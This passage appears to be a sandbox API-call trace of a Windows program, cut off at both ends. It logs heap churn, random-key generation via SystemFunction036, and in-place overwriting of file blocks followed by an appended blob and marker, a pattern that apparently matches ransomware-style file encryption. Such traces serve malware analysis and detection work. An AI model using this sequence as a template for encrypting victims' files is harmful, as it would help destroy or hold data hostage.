lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.074] GetProcessHeap () returned 0x280000 [0077.074] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.074] GetProcessHeap () returned 0x280000 [0077.074] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.074] GetProcessHeap () returned 0x280000 [0077.074] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.074] GetProcessHeap () returned 0x280000 [0077.074] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.074] GetProcessHeap () returned 0x280000 [0077.074] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.074] GetProcessHeap () returned 0x280000 [0077.074] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.075] GetProcessHeap () returned 0x280000 [0077.075] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.075] GetProcessHeap () returned 0x280000 [0077.075] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.075] GetProcessHeap () returned 0x280000 [0077.075] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.075] GetProcessHeap () returned 0x280000 [0077.075] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.075] GetProcessHeap () returned 0x280000 [0077.075] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.075] GetProcessHeap () returned 0x280000 [0077.075] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.075] GetProcessHeap () returned 0x280000 [0077.075] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.075] GetProcessHeap () returned 0x280000 [0077.075] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.075] GetProcessHeap () returned 0x280000 [0077.075] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.075] GetProcessHeap () returned 0x280000 [0077.075] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.075] GetProcessHeap () returned 0x280000 [0077.075] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.075] GetProcessHeap () returned 0x280000 [0077.075] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.075] GetProcessHeap () returned 0x280000 [0077.075] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.075] GetProcessHeap () returned 0x280000 [0077.075] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.075] GetProcessHeap () returned 0x280000 [0077.075] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.075] GetProcessHeap () returned 0x280000 [0077.075] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.075] GetProcessHeap () returned 0x280000 [0077.075] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.075] GetProcessHeap () returned 0x280000 [0077.075] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.075] GetProcessHeap () returned 0x280000 [0077.075] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.075] GetProcessHeap () returned 0x280000 [0077.076] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.076] GetProcessHeap () returned 0x280000 [0077.076] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.076] GetProcessHeap () returned 0x280000 [0077.076] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.076] GetProcessHeap () returned 0x280000 [0077.076] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.076] GetProcessHeap () returned 0x280000 [0077.076] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.076] GetProcessHeap () returned 0x280000 [0077.076] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0077.076] GetProcessHeap () returned 0x280000 [0077.076] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.076] GetProcessHeap () returned 0x280000 [0077.076] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0077.076] GetProcessHeap () returned 0x280000 [0077.076] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0077.076] GetProcessHeap () returned 0x280000 [0077.076] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0077.076] GetProcessHeap () returned 0x280000 [0077.076] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0077.076] GetProcessHeap () returned 0x280000 [0077.076] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0077.076] GetProcessHeap () returned 0x280000 [0077.076] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0077.076] GetProcessHeap () returned 0x280000 [0077.076] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0077.076] GetProcessHeap () returned 0x280000 [0077.076] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0077.076] GetProcessHeap () returned 0x280000 [0077.076] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0077.076] GetProcessHeap () returned 0x280000 [0077.076] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0077.076] GetProcessHeap () returned 0x280000 [0077.076] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0077.077] GetProcessHeap () returned 0x280000 [0077.077] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0077.077] GetProcessHeap () returned 0x280000 [0077.077] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0077.077] GetProcessHeap () returned 0x280000 [0077.077] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0077.077] GetProcessHeap () returned 0x280000 [0077.077] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0077.077] GetProcessHeap () returned 0x280000 [0077.077] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0077.077] GetProcessHeap () returned 0x280000 [0077.077] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0077.077] GetProcessHeap () returned 0x280000 [0077.077] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0077.077] GetProcessHeap () returned 0x280000 [0077.077] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0077.077] GetProcessHeap () returned 0x280000 [0077.077] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0077.077] GetProcessHeap () returned 0x280000 [0077.077] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0077.077] GetProcessHeap () returned 0x280000 [0077.077] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0077.077] GetProcessHeap () returned 0x280000 [0077.077] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0077.077] GetProcessHeap () returned 0x280000 [0077.077] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0077.077] GetProcessHeap () returned 0x280000 [0077.077] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0077.078] GetProcessHeap () returned 0x280000 [0077.078] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0077.078] GetProcessHeap () returned 0x280000 [0077.078] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0077.078] GetProcessHeap () returned 0x280000 [0077.078] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0077.078] GetProcessHeap () returned 0x280000 [0077.078] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0077.078] GetProcessHeap () returned 0x280000 [0077.078] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0077.078] GetProcessHeap () returned 0x280000 [0077.078] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0077.078] GetProcessHeap () returned 0x280000 [0077.078] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0077.078] GetProcessHeap () returned 0x280000 [0077.078] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0077.078] GetProcessHeap () returned 0x280000 [0077.078] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0077.078] GetProcessHeap () returned 0x280000 [0077.078] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0077.078] GetProcessHeap () returned 0x280000 [0077.078] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0077.078] GetProcessHeap () returned 0x280000 [0077.078] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0077.078] GetProcessHeap () returned 0x280000 [0077.078] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0077.078] SetFilePointerEx (in: hFile=0x810, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.078] WriteFile (in: hFile=0x810, lpBuffer=0x7d532e0*, nNumberOfBytesToWrite=0xff, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d532e0*, lpNumberOfBytesWritten=0x722fd44*=0xff, lpOverlapped=0x0) returned 1 [0077.079] WriteFile (in: hFile=0x810, lpBuffer=0x722fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x722fd48*, lpNumberOfBytesWritten=0x722fd44*=0x4, lpOverlapped=0x0) returned 1 [0077.079] GetProcessHeap () returned 0x280000 [0077.079] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8bf0058 | out: hHeap=0x280000) returned 1 [0077.079] GetProcessHeap () returned 0x280000 [0077.079] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0077.079] GetProcessHeap () returned 0x280000 [0077.079] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0077.079] CloseHandle (hObject=0x810) returned 1 [0077.127] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 34 [0077.127] SetFilePointerEx (in: hFile=0x814, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.127] ReadFile (in: hFile=0x814, lpBuffer=0x722fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x722fd4c*, lpNumberOfBytesRead=0x722fd08*=0x0, lpOverlapped=0x0) returned 1 [0077.127] SetFilePointerEx (in: hFile=0x814, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.127] GetProcessHeap () returned 0x280000 [0077.127] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0077.127] GetProcessHeap () returned 0x280000 [0077.127] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9d068 [0077.127] SystemFunction036 (in: RandomBuffer=0x7d9d068, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9d068) returned 1 [0077.127] GetProcessHeap () returned 0x280000 [0077.127] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x8bf0058 [0077.127] ReadFile (in: hFile=0x814, lpBuffer=0x8bf0058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesRead=0x722fd08*=0x1000, lpOverlapped=0x0) returned 1 [0077.195] SetFilePointerEx (in: hFile=0x814, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.196] WriteFile (in: hFile=0x814, lpBuffer=0x8bf0058*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesWritten=0x722fd44*=0x1000, lpOverlapped=0x0) returned 1 [0077.196] GetProcessHeap () returned 0x280000 [0077.196] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0077.196] GetProcessHeap () returned 0x280000 [0077.196] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0077.196] GetProcessHeap () returned 0x280000 [0077.196] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9ccf8 [0077.196] GetProcessHeap () returned 0x280000 [0077.196] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0077.196] GetProcessHeap () returned 0x280000 [0077.196] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0077.196] GetProcessHeap () returned 0x280000 [0077.196] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0077.196] GetProcessHeap () returned 0x280000 [0077.196] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.196] GetProcessHeap () returned 0x280000 [0077.196] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.196] GetProcessHeap () returned 0x280000 [0077.196] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.196] GetProcessHeap () returned 0x280000 [0077.196] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.196] GetProcessHeap () returned 0x280000 [0077.196] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.196] GetProcessHeap () returned 0x280000 [0077.196] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.196] GetProcessHeap () returned 0x280000 [0077.196] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.196] GetProcessHeap () returned 0x280000 [0077.196] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.197] GetProcessHeap () returned 0x280000 [0077.197] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.197] GetProcessHeap () returned 0x280000 [0077.197] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.197] GetProcessHeap () returned 0x280000 [0077.197] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.197] GetProcessHeap () returned 0x280000 [0077.197] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.197] GetProcessHeap () returned 0x280000 [0077.197] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.197] GetProcessHeap () returned 0x280000 [0077.197] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.197] GetProcessHeap () returned 0x280000 [0077.197] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.197] GetProcessHeap () returned 0x280000 [0077.197] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.197] GetProcessHeap () returned 0x280000 [0077.197] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.197] GetProcessHeap () returned 0x280000 [0077.197] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.197] GetProcessHeap () returned 0x280000 [0077.197] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.197] GetProcessHeap () returned 0x280000 [0077.197] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.197] GetProcessHeap () returned 0x280000 [0077.197] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.197] GetProcessHeap () returned 0x280000 [0077.197] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.197] GetProcessHeap () returned 0x280000 [0077.197] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.197] GetProcessHeap () returned 0x280000 [0077.197] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.197] GetProcessHeap () returned 0x280000 [0077.197] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.197] GetProcessHeap () returned 0x280000 [0077.197] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.197] GetProcessHeap () returned 0x280000 [0077.197] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.198] GetProcessHeap () returned 0x280000 [0077.198] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.198] GetProcessHeap () returned 0x280000 [0077.198] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0077.198] GetProcessHeap () returned 0x280000 [0077.198] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.198] GetProcessHeap () returned 0x280000 [0077.198] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0077.198] GetProcessHeap () returned 0x280000 [0077.198] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0077.198] GetProcessHeap () returned 0x280000 [0077.198] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0077.198] GetProcessHeap () returned 0x280000 [0077.198] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0077.198] GetProcessHeap () returned 0x280000 [0077.198] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0077.198] GetProcessHeap () returned 0x280000 [0077.198] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0077.198] GetProcessHeap () returned 0x280000 [0077.198] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0077.198] GetProcessHeap () returned 0x280000 [0077.198] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0077.198] GetProcessHeap () returned 0x280000 [0077.198] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0077.198] GetProcessHeap () returned 0x280000 [0077.198] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0077.198] GetProcessHeap () returned 0x280000 [0077.198] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0077.198] GetProcessHeap () returned 0x280000 [0077.198] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0077.198] GetProcessHeap () returned 0x280000 [0077.198] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0077.198] GetProcessHeap () returned 0x280000 [0077.198] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0077.199] GetProcessHeap () returned 0x280000 [0077.199] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0077.199] GetProcessHeap () returned 0x280000 [0077.199] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0077.199] GetProcessHeap () returned 0x280000 [0077.199] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0077.199] GetProcessHeap () returned 0x280000 [0077.199] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0077.199] GetProcessHeap () returned 0x280000 [0077.199] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0077.199] GetProcessHeap () returned 0x280000 [0077.199] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0077.199] GetProcessHeap () returned 0x280000 [0077.199] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0077.199] GetProcessHeap () returned 0x280000 [0077.199] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0077.199] GetProcessHeap () returned 0x280000 [0077.199] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0077.199] GetProcessHeap () returned 0x280000 [0077.199] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0077.199] GetProcessHeap () returned 0x280000 [0077.199] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0077.199] GetProcessHeap () returned 0x280000 [0077.199] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0077.199] GetProcessHeap () returned 0x280000 [0077.199] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0077.199] GetProcessHeap () returned 0x280000 [0077.199] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0077.200] GetProcessHeap () returned 0x280000 [0077.200] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0077.200] GetProcessHeap () returned 0x280000 [0077.200] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0077.200] GetProcessHeap () returned 0x280000 [0077.200] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0077.200] GetProcessHeap () returned 0x280000 [0077.200] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0077.200] GetProcessHeap () returned 0x280000 [0077.200] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0077.200] GetProcessHeap () returned 0x280000 [0077.200] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0077.200] GetProcessHeap () returned 0x280000 [0077.200] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0077.200] GetProcessHeap () returned 0x280000 [0077.200] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0077.200] GetProcessHeap () returned 0x280000 [0077.200] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0077.200] GetProcessHeap () returned 0x280000 [0077.200] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0077.200] GetProcessHeap () returned 0x280000 [0077.200] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0077.200] GetProcessHeap () returned 0x280000 [0077.200] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0077.200] GetProcessHeap () returned 0x280000 [0077.200] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0077.200] GetProcessHeap () returned 0x280000 [0077.200] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0077.200] SetFilePointerEx (in: hFile=0x814, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.201] WriteFile (in: hFile=0x814, lpBuffer=0x7d532e0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d532e0*, lpNumberOfBytesWritten=0x722fd44*=0x100, lpOverlapped=0x0) returned 1 [0077.201] WriteFile (in: hFile=0x814, lpBuffer=0x722fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x722fd48*, lpNumberOfBytesWritten=0x722fd44*=0x4, lpOverlapped=0x0) returned 1 [0077.201] GetProcessHeap () returned 0x280000 [0077.201] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8bf0058 | out: hHeap=0x280000) returned 1 [0077.201] GetProcessHeap () returned 0x280000 [0077.201] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0077.201] GetProcessHeap () returned 0x280000 [0077.201] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0077.201] CloseHandle (hObject=0x814) returned 1 [0077.203] InterlockedExchangeAdd (in: 